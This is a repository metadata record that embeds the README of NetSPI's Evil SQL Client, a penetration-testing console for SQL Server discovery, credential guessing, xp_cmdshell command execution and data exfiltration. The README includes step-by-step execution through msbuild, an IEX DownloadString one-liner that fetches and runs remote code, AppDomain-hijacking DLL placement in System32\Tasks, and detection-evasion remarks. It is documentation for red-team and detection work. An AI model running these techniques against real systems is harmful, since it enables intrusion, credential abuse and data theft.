{"id":13542186,"url":"https://github.com/NetSPI/ESC","last_synced_at":"2025-04-02T09:33:26.814Z","repository":{"id":142612198,"uuid":"258401697","full_name":"NetSPI/ESC","owner":"NetSPI","description":"Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.","archived":false,"fork":false,"pushed_at":"2023-04-25T14:39:35.000Z","size":3582,"stargazers_count":289,"open_issues_count":2,"forks_count":42,"subscribers_count":9,"default_branch":"master","last_synced_at":"2025-04-02T07:50:06.293Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/NetSPI.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2020-04-24T04:05:25.000Z","updated_at":"2025-03-21T22:14:19.000Z","dependencies_parsed_at":null,"dependency_job_id":"8bdac305-c644-41de-8092-563c65e38306","html_url":"https://github.com/NetSPI/ESC","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NetSPI%2FESC","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NetSPI%2FESC/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NetSPI%2FESC/releases","manifes
ts_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NetSPI%2FESC/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/NetSPI","download_url":"https://codeload.github.com/NetSPI/ESC/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246789230,"owners_count":20834251,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T10:01:02.569Z","updated_at":"2025-04-02T09:33:23.183Z","avatar_url":"https://github.com/NetSPI.png","language":"C#","readme":"![evilsqlclient](https://github.com/NetSPI/ESC/blob/master/screenshots/esc-logo.png)\u003cbr\u003e\n\n--------------------------\u003cbr\u003e\nEvil SQL Client (ESC)\u003cbr\u003e\nVersion: v1.0 \u003cBr\u003e\nAuthor: Scott Sutherland (@_nullbind), NetSPI 2020\u003cBr\u003e\n\u003cbr\u003e\nEvil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features.  While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting Active Directory domain joined SQL Servers during penetration tests and red team engagements.   
The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.\u003cbr\u003e\n \nMost of ESC's functionality is based on the [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL/wiki/), [DAFT](https://github.com/NetSPI/DAFT), [SQLC2](https://github.com/NetSPI/SQLC2), and [SQLInjectionWiki](https://sqlwiki.netspi.com/) projects which are also related to SQL Server.  At the moment ESC does not have full feature parity with the PowerUpSQL or DAFT, but the most useful bits are there.\n\nBelow is a summary of what is covered in this readme:\n\u003cbr\u003e\u003cbr\u003e\n\u003cstrong\u003eExecution Options\u003c/strong\u003e\u003cbr\u003e\n* \u003ca href=\"#compileexe\"\u003eCompile source and run via exe\u003c/a\u003e\n* \u003ca href=\"#runexe\"\u003eDownload release and run via exe\u003c/a\u003e\n* \u003ca href=\"#runmsbuild\"\u003eDownload and run through MSBuild\u003c/a\u003e\n* \u003ca href=\"#runps\"\u003eDownload and run through PowerShell\u003c/a\u003e\n* \u003ca href=\"#runappdomain\"\u003eDownload and run through AppDomain Hijacking\u003c/a\u003e\n\n\u003cstrong\u003eCommand Options\u003c/strong\u003e\u003cbr\u003e\n* \u003ca href=\"#supportedcommands\"\u003eSupported Commands (HELP)\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#cmddiscovery\"\u003eDiscovery Command Examples\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#cmdaccess\"\u003eAccess Check Command Examples\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#targetone\"\u003eQuery Single Target\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#targetmany\"\u003eQuery Multiple Targets\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#cmdescalate\"\u003ePrivilege Escalation Command Examples\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#cmdexfiltrate\"\u003eExfiltration Command Examples\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#pendingcommands\"\u003ePending Commands\u003c/a\u003e 
\u003cbr\u003e\n\n\u003cstrong\u003eDetections\u003c/strong\u003e\n* MSBuild Tests: [Resource1](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md)\n* MSBuild Detection: [Resource1](https://github.com/MHaggis/CBR-Queries/blob/master/msbuild.md) | [Resource2](https://bleepsec.com/2018/11/26/using-attack-atomic-red-team-part1.html)\n* SQL Server Detection: [Resource1](https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/Audit%20Command%20Execution%20Template.sql)\n* AppDomain Detection - Consider monitoring for tasks.dll being written to c:\\Windows\\SysWow64\\Tasks\\ and c:\\Windows\\System32\\Tasks\\, affected files being copied out of system and program file directories, or the \"APPDOMAIN_MANAGER_TYPE\" and \"COMPLUS_Version\" environmental variables being set via the command line or via scripting engines. Disclaimer: I haven't tested the AppDomain detections on scale so I don't know how much white noise they will produce.\n\n# Execution Options \u003ca name=\"exec\"\u003e\u003c/a\u003e\nBelow is a list of options for running the Evil SQL Client (ESC).\n\n### Compile Source and Run Exe \u003ca name=\"compileexe\"\u003e\u003c/a\u003e\n1. Download the source from the [esc folder](https://github.com/NetSPI/ESC/tree/master/esc).\n2. Open the esc.sln file in Visual Studio.\n3. Select Build -\u003e Build Solution.\n4. Run esc.exe.\n\n![buildesc](https://github.com/NetSPI/ESC/blob/master/screenshots/start-esc-compile-1.png) \n \n### Download Release and Run Exe \u003ca name=\"runexe\"\u003e\u003c/a\u003e\n1. Download compiled esc.exe from [releases](https://github.com/NetSPI/ESC/releases). \n2. 
Run esc.exe.\n\n![runescexe](https://github.com/NetSPI/ESC/blob/master/screenshots/start-esc-compile-2.png)\n  \n### Download and Run through MSbuild.exe \u003ca name=\"runmsbuild\"\u003e\u003c/a\u003e\n \nEvil SQL Client console can be run through msbuild inline tasks using the [esc.csproj file](https://github.com/NetSPI/ESC/blob/master/esc.csproj) or [esc.xml file](https://github.com/NetSPI/ESC/blob/master/esc.xml).\u003cbr\u003e  Using msbuild.exe to execute .NET code through inline tasks is a technique that was researched and popularized by Casey Smith. \n\n\u003cstrong\u003eesc.csproj\u003c/strong\u003e\u003cbr\u003e\nesc.csproj includes all of the original Evil SQL Client (ESC) C# source code inline. The inline .NET source code technique used in this variation seems to do a better job of avoiding detection than embedding the exe and calling it through reflection.\n\n\u003cstrong\u003eesc.xml\u003c/strong\u003e\u003cbr\u003e\nesc.xml works a little differently: it has the entire esc.exe hardcoded as a string which is then loaded through reflection using a technique highlighted in the [GhostBuild](https://github.com/bohops/GhostBuild) project by @bohops.  I should note that Windows Defender is pretty good at identifying this exe wrapping technique out of the box.\n\nUpdating esc.xml:\u003cbr\u003e\nTo update esc.xml follow the instructions below:\n1. Download and compile esc.exe.\n2. Run [Out-CompressedDll](https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-CompressedDll.ps1) (by @mattifestation) against esc.exe.\u003cbr\u003e\n`Out-CompressedDll -FilePath esc.exe | out-file output.txt`\n3. Replace the compressedBin string in esc.xml with the \"EncodedCompressedFile\" string generated by Out-CompressedDll.\n4. Replace compressedBinSize with the size generated by Out-CompressedDll.\n5. 
Run the script.\u003cbr\u003e\n`C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe esc.xml`\n\n\u003cstrong\u003eExecution Examples\u003c/strong\u003e\u003cbr\u003e\nBelow are a few execution examples. Msbuild can accept a filepath on the command line, but no filepath is required if only one .csproj file exists in the directory you're executing msbuild.exe from.  \n\nIn the examples below, esc.csproj has been renamed to 1.csproj:\n\u003cbr\u003e\u003cbr\u003e\n `C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe` \u003cbr\u003e\n ![runescexe](https://github.com/NetSPI/ESC/blob/master/screenshots/start-esc-msbuild-1.png) \n \u003cbr\u003e\u003cbr\u003e\n `C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe esc.csproj` \u003cbr\u003e\n `C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe esc.xml` \u003cbr\u003e\n![runescexe](https://github.com/NetSPI/ESC/blob/master/screenshots/start-esc-msbuild-2.png) \n\n### Download and Run Functions through PowerShell \u003ca name=\"runps\"\u003e\u003c/a\u003e\nBelow are some quick instructions for running ESC functions through PowerShell.\n\n1. Download esc.exe.\n2. Open PowerShell and load esc.exe through reflection.\u003cbr\u003e\n`[System.Reflection.Assembly]::LoadFile(\"c:\\temp\\esc.exe\")`\n3. Alternatively, [esc-example.ps1](https://github.com/NetSPI/ESC/blob/master/esc-example.ps1) contains a portable example generated using Out-CompressedDll.  It can be loaded using the PowerShell command below.\u003cbr\u003e\n`IEX(New-Object System.Net.WebClient).DownloadString(\"https://raw.githubusercontent.com/NetSPI/ESC/master/esc-example.ps1\")`\n4. After the assembly is loaded you can run the desired function.  
Examples below.\n\u003cpre\u003e\n[evilsqlclient.Program+EvilCommands]::GetSQLServersBroadCast()\n[evilsqlclient.Program+EvilCommands]::GetSQLServersSpn()\n[evilsqlclient.Program+EvilCommands]::MasterDiscoveredList\n[evilsqlclient.Program+EvilCommands]::InstanceAllG = \"enabled\"\n[evilsqlclient.Program+EvilCommands]::CheckAccess()\n[evilsqlclient.Program+EvilCommands]::MasterAccessList\n[evilsqlclient.Program+EvilCommands]::CheckDefaultAppPw()\n[evilsqlclient.Program+EvilCommands]::CheckLoginAsPw()\n[evilsqlclient.Program+EvilCommands]::MasterAccessList\n\u003c/pre\u003e\n\n### Download and Run through AppDomain Hijacking \u003ca name=\"runappdomain\"\u003e\u003c/a\u003e\nApplication domains provide an isolation boundary for security, reliability, and versioning, and for unloading .NET assemblies. Application domains are typically created by runtime hosts, which are responsible for bootstrapping the common language runtime before an application is run.  A typical application loads several assemblies into an application domain before the code they contain can be executed.   The default AppDomainManager can be replaced by setting the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environmental variables. This provides users with the means to load and execute .NET code from custom assemblies prior to the execution of the intended application, but within its process and thread.  \n\nReference: https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains  \n\nIt is possible to leverage that functionality and default write access to the c:\\windows\\system32\\tasks\\ directory to execute arbitrary .NET code through c:\\windows\\system32\\ and c:\\windows\\SysWow64\\ assemblies that import mscoree.dll. 
This technique was originally shared during Casey Smith's DerbyCon presentation [\".Net Manifesto - Win Friends and Influence the Loader\"](https://www.youtube.com/watch?v=BIJ2L_rM9Gc).\n\nBelow are instructions for executing ESC using this method.\n\n1. Compile [esc-appdomain-hijack.cs](https://github.com/NetSPI/ESC/blob/master/esc-appdomain-hijack.cs) to tasks.dll. \n\u003cpre\u003e\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.Reflection.dll /r:System.IO.Compression.dll /r:System.Runtime.InteropServices.dll /r:System.EnterpriseServices.dll /target:library /out:tasks.dll esc-appdomain-hijack.cs\n\u003c/pre\u003e\n\n2. Update environment variables. Note: process, user, or system scope could be targeted.\n\u003cpre\u003e\nset APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null\nset APPDOMAIN_MANAGER_TYPE=Esc\nset COMPLUS_Version=v4.0.30319\n\u003c/pre\u003e\n\n3. Copy tasks.dll to target directories.\n\u003cpre\u003e\ncopy tasks.dll C:\\Windows\\System32\\Tasks\\tasks.dll\ncopy tasks.dll C:\\Windows\\SysWow64\\Tasks\\tasks.dll\n\u003c/pre\u003e\n\n4. Identify .exe files in c:\\windows\\system32\\ that load mscoree.dll.  This can be done quickly using the Get-PE function from Matt Graeber's [PowerShell Arsenal Project](https://github.com/mattifestation/PowerShellArsenal).\n\u003cpre\u003e\ngci c:\\windows\\system32\\*.exe | get-pe | where-object {$_.Imports.ModuleName -Contains \"mscoree.dll\"} | Select ModuleName -ExpandProperty modulename\n\u003c/pre\u003e\n\n5. 
Choose one of the affected commands and run it.\n\u003cpre\u003e\nExamples:\nC:\\windows\\system32\\acu.exe\nC:\\windows\\system32\\aitstatic.exe\nC:\\windows\\system32\\ClusterUpdateUI.exe\nC:\\windows\\system32\\dsac.exe\nC:\\windows\\system32\\FileHistory.exe\nC:\\windows\\system32\\LbfoAdmin.exe\nC:\\windows\\system32\\Microsoft.Uev.SyncController.exe\nC:\\windows\\system32\\mtedit.exe\nC:\\windows\\system32\\PresentationHost.exe\nC:\\windows\\system32\\RAMgmtUI.exe\nC:\\windows\\system32\\ScriptRunner.exe\nC:\\windows\\system32\\ServerManager.exe\nC:\\windows\\system32\\ShieldingDataFileWizard.exe\nC:\\windows\\system32\\stordiag.exe\nC:\\windows\\system32\\SynapticsUtility.exe\nC:\\windows\\system32\\TemplateDiskWizard.exe\nC:\\windows\\system32\\TsWpfWrp.exe\nC:\\windows\\system32\\UevAgentPolicyGenerator.exe\nC:\\windows\\system32\\UevAppMonitor.exe\nC:\\windows\\system32\\UevTemplateBaselineGenerator.exe\nC:\\windows\\system32\\UevTemplateConfigItemGenerator.exe\nC:\\windows\\system32\\Vmw.exe\n\u003c/pre\u003e\n\n![runappdomain](https://github.com/NetSPI/ESC/blob/master/screenshots/esc-execute-via-appdomain-hijack3.png) \n\nThis can also be done by copying the affected EXE and the tasks.dll to a directory that's writable by the user.  To detect those scenarios, consider monitoring for files being copied from system directories. However, note that attackers may be able to identify other affected EXEs on the system using the same discovery technique listed above.\n\n![runappdomain](https://github.com/NetSPI/ESC/blob/master/screenshots/esc-execute-via-appdomain-hijack4.png) \n\nUsing the steps below ESC can also be executed using cscript.exe once the tasks.dll has been written to disk.  Once again, based on Casey Smith's templates.\n\n1. 
Create the file trigger.js with the content below.\n\u003cpre\u003e\nnew ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';\nnew ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'c:\\\\Windows\\\\System32\\\\Tasks';\nnew ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = 'tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null';\nnew ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = 'Esc';\nvar o = new ActiveXObject(\"System.Object\");\n\u003c/pre\u003e\n\n2. Execute it using cscript.exe.\n\u003cpre\u003e\ncscript trigger.js\n\u003c/pre\u003e\n\n![runappdomain2](https://github.com/NetSPI/ESC/blob/master/screenshots/esc-execute-via-appdomain-hijack2.png) \n\nNote: Detections could include monitoring for tasks.dll being written to C:\\Windows\\System32\\Tasks\\tasks.dll and C:\\Windows\\SysWow64\\Tasks\\tasks.dll, and potentially the execution of the commands above with or without parameters.\n\nESC can also be executed through AppDomain hijacking using a configuration file.  \n\n1. Create a configuration file in the same folder as the target assembly, and name it after the target binary.  Example below.\n\u003cpre\u003eScriptRunner.exe.config\u003c/pre\u003e\n\n2. Below is sample XML for the config file.\n\n```xml\n\u003cconfiguration\u003e\n  \u003cruntime\u003e\n    \u003cassemblyBinding xmlns=\"urn:schemas-microsoft-com:asm.v1\"\u003e\n      \u003cprobing privatePath=\"C:\\Windows\\Tasks\"/\u003e\n    \u003c/assemblyBinding\u003e\n    \u003cappDomainManagerAssembly value=\"Tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null\" /\u003e\n    \u003cappDomainManagerType value=\"Esc\" /\u003e\n  \u003c/runtime\u003e\n\u003c/configuration\u003e\n```\n3. 
Run the target binary.\n\n\u003cpre\u003eScriptRunner.exe\u003c/pre\u003e\n\nNote: Alternatively, the assemblyBinding and probing tags can be removed from the configuration file and replaced with the \u003cdevelopmentMode developerInstallation=\"true\"/\u003e tag within the runtime tag. If that tag is present in the configuration file, the .NET application will attempt to use the DEVPATH environmental variable as a search path for referenced assemblies. As such, it can be used as an alternative to probing.\n\nReference: https://learn.microsoft.com/en-us/dotnet/framework/configure-apps/how-to-locate-assemblies-by-using-devpath\n\n# Supported Commands \u003ca name=\"supportedcommands\"\u003e\u003c/a\u003e\n\n### COMMAND LIST\n\u003cpre\u003e\n    SHOW:\n     show settings \t\t\tShow connection and exfil settings.\n     show discovered \t\t\tShow discovered instances. \n     show access  \t\t\tShow accessible instances, versions, and other information.\n     show help \t\t\t\tShow this help page.\n \n    CONFIGURE INSTANCE:\n     set targetall\t\t\tTarget all accessible SQL Server instances. List with 'show access' command.\n     set instance instancename\t\tTarget a single instance.  Instance formats supported include: \n \t\t\t\t    \tserver1\n \t\t\t\t    \tserver1\\instance1\n \t\t\t\t    \tserver1,1433\n     set connstring stringhere \t\tSet a custom connection string. 
Examples below.\n\t\t\t\t   \t Server=Server\\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1\n\t\t\t\t    \tServer=Server\\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1;uid=Domain\\Account;pwd=Password;\n\t\t\t\t    \tServer=Server\\Instance;Database=Master;Connection Timeout=1;User ID=Username;Password=Password\n \n    CONFIGURE CREDENTIALS:\n     set username username \t\tUser for authenticating to SQL Server instances.\n \t\t\t\t   \tDefaults to current Windows user if no username or password is provided, but accepts SQL Login credentials.\n     set password password\t\tPassword for the provided username.  \n \t\t\t\t    \tDefaults to current Windows user if no user or password is provided.\n \n    QUERY COMMANDS:\n     set timeout 1\t\t\tSet query timeout. Useful over slow connections.\n     query\t\t\t\tArbitrary TSQL query can be executed once a valid connection string is configured.\n\t\t\t\t    \tTo run against all accessible instances type 'set targetall enabled'.\n\t\t\t\t    \tType the query, then go, and press enter. Multi-line queries are supported.\n\t\t\t\t    \tNote: You don't have to type the word 'query'.\n\t\t\t\t    \tExample:\n\t\t\t\t    \tSELECT @@VERSION\n\t\t\t\t    \tGO\n \n    DISCOVERY COMMANDS:\n     discover broadcast\t\t\tDiscover SQL Server instances via a broadcast request.\n     discover domainspn\t\t\tDiscover SQL Server instances via LDAP query to the default DC for MSSQL SPNs.\n     discover file filepath\t\tDiscover SQL Server instances listed in a file.  One per line.\n\t\t\t\t    \tFormat examples: \n\t\t\t\t    \thostname \n\t\t\t\t    \thostname\\instance\n\t\t\t\t    \thostname,port\n     show discovered\t\t\tDisplay the list of discovered SQL Server instances.\n     export discovered outpath\t\tExport the list of discovered SQL Server instances to a file. 
\n\t\t\t\t   \t Example: export discovered c:\\windows\\temp\\sqlinstances.txt\n     clear discovered\t\t\tClear list of discovered SQL Server instances.\n\n    INITIAL ACCESS COMMANDS:\n     check access\t\t\tAttempts to log into all discovered SQL Server instances.  \n \t\t\t\t    \tUses current Windows/Domain user by default. \n\t\t\t\t    \tNote: Will use alternative credentials if provided. (set username / set password)\n     show access\t\t\tList SQL Server instances that can be logged into.\n     export access outpath\t\tExport list of SQL Server instances that can be logged into to a file.\n     clear access\t\t\tClear the in-memory list of SQL Server instances that can be logged into.\n     check defaultlogins\t\tAttempts to identify SQL Server instances that match known applications and attempts the associated usernames and passwords.\n\n\n    POST EXPLOITATION COMMANDS:\n     list serverinfo\t\t\tList server information for accessible target SQL Server instances.\n     list databases\t\t\tList databases for accessible target SQL Server instances.\n     list tables\t\t\tList table information for accessible target SQL Server instances.\n  \t\t\t\t    \tLimits results to databases the login user has access to.\n     list links\t\t\t\tList link information for accessible target SQL Server instances.\n     list logins\t\t\tList login information for accessible target SQL Server instances.\n     list rolemembers\t\t\tList role member information for accessible target SQL Server instances.\n     list privs\t\t\t\tList privilege information for accessible target SQL Server instances.  \n     check loginaspw     \t\tCheck accessible target SQL Server instances for logins that use their login as a password.
\n     check uncinject IP\t\t\tConnect to target SQL Server instance and perform UNC injection back to the provided IP.\n     run OSCMD command\t\t\tRun an OS command through xp_cmdshell on the accessible target SQL Server instances. \n \t\t\t\t    \t*Requires sysadmin privileges.\n \n    CONFIGURE DATA EXFILTRATION: \n     set file enabled\n     set filepath c:\\temp\\file.csv\n     set icmp enabled\n     set icmpip 127.0.0.1\n     set http enabled\n     set httpurl http://127.0.0.1\n     set encrypt enabled\n     set enckey MyKey!\n     set encsalt MySalt!\n\n    MISC COMMANDS:\n     help\n     clear\n     exit\n\u003c/pre\u003e\n \n### Common Command Sequences \u003ca name=\"recommendcommands\"\u003e\u003c/a\u003e\nBelow are some common command examples to get you started.\n\n\u003cstrong\u003eDiscovering SQL Server Instances\u003c/strong\u003e\u003cbr\u003e \u003ca name=\"cmddiscovery\"\u003e\u003c/a\u003e\nBelow are a few common methods to identify SQL Servers on the network and domain without port scanning.\n \n`discover domainspn`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Discovery-DomainSPN.png)\u003cbr\u003e\n\n`discover broadcast`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Discovery-Broadcast.png)\u003cbr\u003e\n\n`show discovered`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Discovery-Show.png)\u003cbr\u003e\n\n\u003cstrong\u003eChecking Access to Discovered Instances\u003c/strong\u003e\u003cbr\u003e \u003ca name=\"cmdaccess\"\u003e\u003c/a\u003e\nAfter discovery, `check access` can be used to determine if the current or provided credentials can log into the discovered SQL Server instances.\n \n`set targetall enabled` \u003cbr\u003e\n`show settings`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Access-TargetAll.png)\u003cbr\u003e\n \n`check 
access`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Access-CheckAccess.png)\u003cbr\u003e\n \n`show access`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Access-ShowAccess.png)\u003cbr\u003e\n \n\u003cstrong\u003eQuery Single Target\u003c/strong\u003e \u003ca name=\"targetone\"\u003e\u003c/a\u003e \u003cbr\u003e\nBelow are commands that can be used to target and query a single SQL Server instance. \u003cbr\u003e\n\nFirst configure ESC to target a single instance.  This will automatically disable the \"targetall\" setting.\u003cbr\u003e\u003cbr\u003e\n`Set target MSSQLSRV04\\SQLSERVER2014` \u003cbr\u003e\n`Set username backdoor_account`\u003cbr\u003e\n`Set password backdoor_account`\u003cbr\u003e\n`Show settings`\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Target-Instance1.png)\u003cbr\u003e\n\nNext simply execute your query and end your TSQL with the keyword \"go\". \u003cbr\u003e\u003cbr\u003e \n`select @@version`\u003cbr\u003e\n`go`\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Target-Instance3.png)\u003cbr\u003e\n\nYou can also run \"list\" and other post exploitation commands against the target instance. \u003cbr\u003e\u003cbr\u003e \n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Target-Instance2.png)\u003cbr\u003e\n\n\u003cstrong\u003eQuery Multiple Targets\u003c/strong\u003e \u003ca name=\"targetmany\"\u003e\u003c/a\u003e \u003cbr\u003e\nBelow are commands that can be used to target and query all accessible SQL Server instances.  \u003cbr\u003e\n1. Import a list of target instances with the `discover file`, `discover domainspn`, or `discover broadcast` commands.\u003cbr\u003e\n2. Identify which instances you can log into. \u003cbr\u003e\n`check access`\u003cbr\u003e\n3. Enable multi-instance targeting using the command below.  
Once enabled, all commands and queries will be run against all accessible SQL Server instances.\u003cbr\u003e\u003cbr\u003e\n`set targetall enabled`\u003cbr\u003e\n`show settings`\u003cbr\u003e\n4. Run queries as normal.\u003cbr\u003e\n`select @@version`\u003cbr\u003e\n`go`\u003cbr\u003e\n\n\u003cstrong\u003eTesting for Common Password Issues\u003c/strong\u003e\u003cbr\u003e \u003ca name=\"cmdescalate\"\u003e\u003c/a\u003e\nBelow are some checks for common password issues that can be used to gain initial entry and escalate privileges in some environments.\nIf \"targetall\" is enabled the commands below will target all discovered or accessible instances.  However, if a single instance is provided, then \"targetall\" will automatically be disabled to ensure only the one instance is targeted.\n\n`check defaultpw` \u003cbr\u003e\n`check defaultpw` is run against discovered instances and does not require valid credentials. \u003cbr\u003e\n[Related Reading](https://blog.netspi.com/attacking-application-specific-sql-server-instances/) \u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Access-CheckDefaultPw.png)\u003cbr\u003e\n \n`check loginaspw` \u003cbr\u003e\n`check loginaspw` can be used once authenticated to enumerate all logins and test if they are using the login as the password. \u003cbr\u003e\n[Related Reading](https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/) \u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/LoginAsPw1.png)\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/LoginAsPw2.png)\u003cbr\u003e\n \n\u003cstrong\u003eRunning OS Commands\u003c/strong\u003e\u003cbr\u003e\nBelow is an ESC command for running OS commands on target instances.  
It requires sysadmin privileges.\u003cbr\u003e\n\n`run oscmd whoami`\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/RunOsCmd1.png)\u003cbr\u003e\n \n\u003cstrong\u003eSaving List of Accessible Servers\u003c/strong\u003e\u003cbr\u003e\nThe command below can be used to export a list of servers that you can log into.\u003cbr\u003e\n`export access c:\\temp\\access.csv`\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/AccessExport1.png)\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/AccessExport2.png)\u003cbr\u003e\n \n\u003cstrong\u003eData Exfiltration Example: Local File\u003c/strong\u003e\u003cbr\u003e \u003ca name=\"cmdexfiltrate\"\u003e\u003c/a\u003e\nBelow is an example of how to exfiltrate data to a local file.\n \n`set file enabled`\u003cbr\u003e\n`set filepath c:\\temp\\output.csv`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/FileExfil1.png)\u003cbr\u003e\n \n`select @@version`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/FileExfil2.png)\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/FileExfil3.png)\u003cbr\u003e\n \n\u003cstrong\u003eData Exfiltration Example: ICMP\u003c/strong\u003e\u003cbr\u003e\nBelow is an example of how to exfiltrate data over ICMP with ESC.\n \n`set icmp enabled` \u003cbr\u003e\n`set icmpip 192.168.1.1`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/IcmpExfil1.png)\u003cbr\u003e\n \n`select @@version`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/IcmpExfil12.png)\u003cbr\u003e \n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/IcmpExfil3.png)\u003cbr\u003e\n\n \n# Pending Commands \u003ca name=\"pendingcommands\"\u003e\u003c/a\u003e\n* Add logging w/ timestamps\n* Add discover local \n* Add discover udpscan\n* Add column find\n* Add domain 
account enumeration\n* Add link crawl + linkquery + linkoscmd\n* Add escalate dbowner\n* Add escalate impersonate\n* Threading\n* Finish data encryption\n* Create python/powershell script to decrypt encrypted exfiltrated data\n* Rewrite query function to be more flexible\n\n# Pending fixes\n* Crashes when you just type go\n* Crashes when you type ctrl+c\n\n# Thank You\nBelow is a list of people who tested out esc and/or provided .NET development guidance.  Thanks for all the help!\n- Alexander Leary (@0xbadjuju) \n- Ivan Da Silva   (@humble_desser)\n- Josh Weber      \n- Kevin Robertson (@kevin_robertson) \n","funding_links":[],"categories":["Exploitation"],"sub_categories":["SQL Injection"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNetSPI%2FESC","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FNetSPI%2FESC","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNetSPI%2FESC/lists"}